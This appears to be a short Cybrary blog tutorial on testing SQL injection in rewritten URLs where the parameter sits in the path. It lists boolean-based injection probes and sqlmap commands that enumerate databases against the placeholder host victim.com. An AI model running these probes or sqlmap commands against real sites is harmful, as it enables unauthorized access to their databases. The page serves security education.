Coming mid-July
Cybrary Reimagined.
People first, Security first.
Coming mid-July.
Cybrary Reimagined.
Celebrate Cybersecurity Awareness Month with our buy 2, get 1 offer!
People first, Security first.
Valid until October 31. Elevate your skills today!
Start for free
How to Test and Exploit SQL Injections in URL Rewrite Rules - Cybrary

First of all, what is URL rewrite?You've likely seen sites with this schema in URLs: https://victim.com/?id=1Most everyone knows how to test for SQL injection in this situation ---> http://mysite.com/?id=1' or http://mysite.com/?id=1 and 2.5=2.5 or http://mysite.com/?id=1 and 3.4=3.5and etc.But, in URL rewrites, this UR http://victim.com/?id=1 will become http://victim.com/1 ,{id is hidden and the parameter 1 is used in url}For testing SQL injection in these kind of URLs, we just use our payloads as before, but after the parameter :http://victim.com/1' or http://victim.com/1 and 3.6=3.6http://victim.com/1 and 3.6=3.77and etc.The results would be the same as a normal post parameter.For  testing SQL injection with SQLMAP, we just use a star in the format. For instance:sqlmap -u "http://victim.com/1*" --random-agent --level 5 --risk 3 --dbsorsqlmap -u "http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbsFor injecting in the content parameter, the star sign shows sqlmap where to inject payloads. Happy Hacking

Start learning with Cybrary

Create a free account

Related Posts

All Blogs